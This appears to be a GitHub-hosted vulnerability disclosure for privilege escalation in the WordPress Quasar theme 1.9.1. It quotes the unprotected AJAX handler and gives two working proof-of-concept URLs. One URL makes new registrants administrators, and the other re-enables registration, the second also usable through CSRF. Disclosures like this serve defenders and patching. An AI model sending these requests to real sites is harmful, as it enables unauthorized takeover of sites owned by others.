-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathwp-quasar.txt
44 lines (33 loc) · 1.73 KB
/
wp-quasar.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
WordPress Quasar Theme Previlege Escalation
[-] Theme Link:
http://themeforest.net/item/quasar-wordpress-theme-with-animation-builder/6126939?ref=XanderRock
[-] Affected Version:
Version 1.9.1
[-] Vulnerability Description:
The vulnerable code is located in the /rock-builder/rock-builder-ui.php script:
function rock_builder_save_template(){
$data = $_REQUEST['data'];
$template = $_REQUEST['template'];
$templateName = $template['name'];
$templateDBName = $template['database_name'];
update_option($templateDBName, $data);
$builderReferences = get_option("rock_builder_references",array());
$i = 0;
foreach($builderReferences as $ref){
if($ref['database_name'] == $templateDBName){
$builderReferences[$i]['name'] = $templateName;
update_option("rock_builder_references",$builderReferences);
//echo "FOUND";
break;
}
$i++;
}
exit;
}
add_action("wp_ajax_rockAjax_save_builder_template","rock_builder_save_template");
then function rock_builder_save_template can be called by logged in users and executed which can lead to modifying wordpress settings and adding a new administrator which may cause the site a full take over
[-] Proof of Concept:
Accessing The Url below with a logged in user will set the default role of any new registered user as administrator(if you already had a user)
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=administrator&template%5Bdatabase_name%5D=default_role
Accessing The Url below with a logged in user will allow user registration if it was disabledthis can be exploited by sending it to a logged in user or administrater (CSRF)
http://domain.tld/wp-admin/admin-ajax.php?action=rockAjax_save_builder_template&data=1&template%5Bdatabase_name%5D=users_can_register